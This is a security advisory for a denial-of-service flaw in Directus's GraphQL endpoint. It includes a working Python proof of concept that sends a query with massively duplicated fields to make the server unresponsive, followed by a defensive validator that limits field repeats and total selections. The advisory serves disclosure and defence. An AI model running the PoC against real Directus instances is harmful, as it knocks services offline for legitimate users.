OSV:GHSA-7HMH-PFRP-VCX4

Directus GraphQL Field Duplication Denial of Service (DoS)

Published: 2024-07-08 18:41:00 (Google, osv.dev)

CVSS3: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: HIGH

AI Score: 7 (Confidence: High)
EPSS: 0 (Percentile: 9.2%)

Summary

A denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.

Details

Requests to the /graphql endpoint are sent when visualizing graphs generated in a dashboard:

[Image: DoS5]

By modifying the data sent and duplicating the fields many times, a DoS attack is possible.

PoC

The goal is to create a payload that generates a body like this, where the ‘max’ field is duplicated many times, each with the ‘id’ field duplicated many times inside it.
{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}

Although that payload seems harmless, a bigger one leaves the service unresponsive.

The following code might serve as a PoC written in Python3:

# GitHub @asantof

import requests

## CHANGE THESE VALUES: url, auth_token, query_name, collection_name
url = 'http://0.0.0.0:8055/graphql'
auth_token = ''
query_name = 'query_XXXXX'
collection_name = ''

headers = {
    'Content-Type': 'application/json',
    'Authorization': f'Bearer {auth_token}',
}

id_payload = 'id ' * 200
max_payload = 'max {' + id_payload + ' } '
full_payload = max_payload * 200

data = {
    'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'
}

print(data)

response = requests.post(url, headers=headers, json=data)

print(response.json())

[Image: DoS4]

After running it, the service will be unresponsive for a while:

[Image: DoS]

Impact

The vulnerability impacts the service’s availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.
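The mitigation is to bound the work a query can request before it reaches the executor. As an added example, not Directus code and not the advisory author's PoC, the Python below tokenizes a GraphQL document, walks its selection sets, and rejects a query that repeats one field too often in a single selection set or selects too many fields overall. It goes beyond the advisory's specific payload: aliased repeats (a: id b: id) and fields pulled in through inline fragments are counted too, since both still run a resolver. The thresholds (500 fields, 3 repeats) are assumed defaults, the hand-rolled tokenizer stands in for a real parser so the example runs without dependencies, and build_duplicated_query only constructs input with the advisory's shape to exercise the check. In a deployment this logic belongs in a validation rule of the GraphQL library in use, where it sees the parsed AST rather than raw text.

```python
import re
from dataclasses import dataclass

# Whitespace, comments, punctuators, names, strings, then anything else (numbers, $vars, @directives, ...).
TOKEN_RE = re.compile(r'\s+|#[^\n]*|[{}():]|[A-Za-z_][A-Za-z0-9_]*|"(?:\\.|[^"\\])*"|[^\s{}():"]+')


@dataclass
class QueryStats:
    total_fields: int = 0    # every field selection, duplicates and aliases included
    max_duplicates: int = 0  # highest repeat count of one field name in one selection set
    max_depth: int = 0       # deepest nesting of selection sets


def tokenize(document: str) -> list:
    """Split a GraphQL document into tokens, dropping whitespace and comments."""
    return [m.group(0) for m in TOKEN_RE.finditer(document)
            if not m.group(0).isspace() and not m.group(0).startswith('#')]


def analyze(document: str) -> QueryStats:
    """Walk every selection set in the document and collect cost statistics."""
    tokens = tokenize(document)
    stats = QueryStats()

    def skip_parens(i: int) -> int:
        # tokens[i] == '(': return the index just past the matching ')'
        depth = 0
        while i < len(tokens):
            depth += {'(': 1, ')': -1}.get(tokens[i], 0)
            i += 1
            if depth == 0:
                return i
        raise ValueError('unbalanced parentheses')

    def skip_directives(i: int) -> int:
        # '@include(if: $x)' and friends run no resolver; step over them
        while i < len(tokens) and tokens[i].startswith('@'):
            i += 1
            if i < len(tokens) and tokens[i] == '(':
                i = skip_parens(i)
        return i

    def selection_set(i: int, depth: int, counts=None) -> int:
        # tokens[i] == '{': consume through the matching '}', counting fields by name
        counts = {} if counts is None else counts
        stats.max_depth = max(stats.max_depth, depth)
        i += 1
        while i < len(tokens) and tokens[i] != '}':
            name = tokens[i]
            i += 1
            if name.startswith('...'):
                # inline fragment or fragment spread: its fields merge into this set
                if name == '...' and i < len(tokens) and tokens[i] == 'on':
                    i += 2  # skip 'on TypeName'
                i = skip_directives(i)
                if i < len(tokens) and tokens[i] == '{':
                    i = selection_set(i, depth, counts)
                continue
            if i + 1 < len(tokens) and tokens[i] == ':':
                name = tokens[i + 1]  # alias: the resolver that runs is the real field
                i += 2
            if i < len(tokens) and tokens[i] == '(':
                i = skip_parens(i)
            i = skip_directives(i)
            counts[name] = counts.get(name, 0) + 1
            stats.total_fields += 1
            stats.max_duplicates = max(stats.max_duplicates, counts[name])
            if i < len(tokens) and tokens[i] == '{':
                i = selection_set(i, depth + 1)
        if i >= len(tokens):
            raise ValueError('unbalanced braces')
        return i + 1

    i = 0
    while i < len(tokens):  # operation keyword, name, variables and directives precede '{'
        if tokens[i] == '(':
            i = skip_parens(i)
        elif tokens[i] == '{':
            i = selection_set(i, 1)
        else:
            i += 1
    return stats


def check_query(document: str, max_fields: int = 500, max_duplicates: int = 3):
    """Return (accepted, reason). The limits are assumed defaults, not Directus settings."""
    try:
        s = analyze(document)
    except ValueError as exc:
        return False, f'malformed query: {exc}'
    if s.max_duplicates > max_duplicates:
        return False, f'a field repeats {s.max_duplicates} times in one selection set (limit {max_duplicates})'
    if s.total_fields > max_fields:
        return False, f'{s.total_fields} field selections exceed the limit of {max_fields}'
    return True, 'ok'


def build_duplicated_query(repeat: int, collection: str = 'test_table') -> str:
    """Constructed query with the advisory's shape, used only to exercise the check."""
    return ('query { q: ' + collection + '_aggregated { '
            + ('max {' + 'id ' * repeat + '} ') * repeat + '} }')
```

The advisory's "harmless-looking" 10x10 body already resolves 111 fields with one name repeated 10 times in a single selection set, so it trips the duplicate limit; the 200x200 body would resolve 40,201. A benign dashboard query such as query { articles(limit: 5) { id title author { name } } } passes untouched, which is the property to verify when picking thresholds for a real schema.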

